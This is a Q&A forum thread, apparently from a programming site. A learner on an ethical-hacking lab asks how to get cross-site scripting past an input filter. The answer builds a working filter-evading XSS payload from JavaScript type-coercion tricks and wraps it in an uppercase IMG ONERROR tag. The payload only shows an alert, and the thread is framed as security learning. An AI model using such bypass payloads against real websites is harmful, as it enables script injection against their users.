# How can I perform XSS attack?

Tags: javascript

I am trying to learn ethical hacking. I am trying a lab tutorial and the website filters inputs. The website is at the below. What can I try?

I tried alert(1) but this is js function. It was filtered.

Comment: What is preventing you from doing whatever it is you’re trying to do? A JS function? That function lives in your browser. You have access to your browser and things like the REPL, where functions can be examined, proxied in different ways, etc.

Comment: @DaveNewton XSS is done with someone else's browser: https://owasp.org/www-community/attacks/xss/

Comment: I am trying to find a payload that can pass from this filter and give an alert. I want to find a payload that I can inject in "123" div.

Answer (score 2):

It's possible to extract lowercase characters from type casting various JavaScript values to strings which can be created from various expressions:

```js
!0+''   = 'true'
!1+''   = 'false'
{}+''   = '[object Object]'
1/0+''  = 'Infinity'
0/0+''  = 'NaN'
[]._+'' = 'undefined'
```

From that we can get most of the alphabet by indexing into those strings:

```js
a: (!1+'')[1]
b: ({}+'')[2]
c: ({}+'')[5]
d: ([]._+'')[2]
e: (!1+'')[4]
f: (1/0+'')[2]
g:
h:
i: (1/0+'')[3]
j: ({}+'')[3]
k:
l: (!1+'')[2]
m:
n: (1/0+'')[1]
o: ({}+'')[1]
p:
q:
r: (!0+'')[1]
s: (!1+'')[3]
t: ({}+'')[6]
u: (!0+'')[2]
v:
w:
x:
y: (1/0+'')[7]
z:
```

(The other characters could be obtained indirectly or from some other expression not coming to mind.)

Then we can encode a payload like:

```js
({}['constructor']['constructor']('alert'+'(1)'))()
```

Into this monstrosity:

```js
({}[({}+'')[5]+({}+'')[1]+(1/0+'')[1]+(!1+'')[3]+({}+'')[6]+(!0+'')[1]+(!0+'')[2]+({}+'')[5]+({}+'')[6]+({}+'')[1]+(!0+'')[1]][({}+'')[5]+({}+'')[1]+(1/0+'')[1]+(!1+'')[3]+({}+'')[6]+(!0+'')[1]+(!0+'')[2]+({}+'')[5]+({}+'')[6]+({}+'')[1]+(!0+'')[1]]((!1+'')[1]+(!1+'')[2]+(!1+'')[4]+(!0+'')[1]+({}+'')[6]+'(1)'))()
```

Which could be wrapped up in an uppercase IMG HTML tag ONERROR attribute (HTML being case insensitive):

```html
<IMG SRC="/" ONERROR="({}[({}+'')[5]+({}+'')[1]+(1/0+'')[1]+(!1+'')[3]+({}+'')[6]+(!0+'')[1]+(!0+'')[2]+({}+'')[5]+({}+'')[6]+({}+'')[1]+(!0+'')[1]][({}+'')[5]+({}+'')[1]+(1/0+'')[1]+(!1+'')[3]+({}+'')[6]+(!0+'')[1]+(!0+'')[2]+({}+'')[5]+({}+'')[6]+({}+'')[1]+(!0+'')[1]]((!1+'')[1]+(!1+'')[2]+(!1+'')[4]+(!0+'')[1]+({}+'')[6]+'(1)'))()">
```

In short this filtering strategy is not safe and injections are limited only by your determination.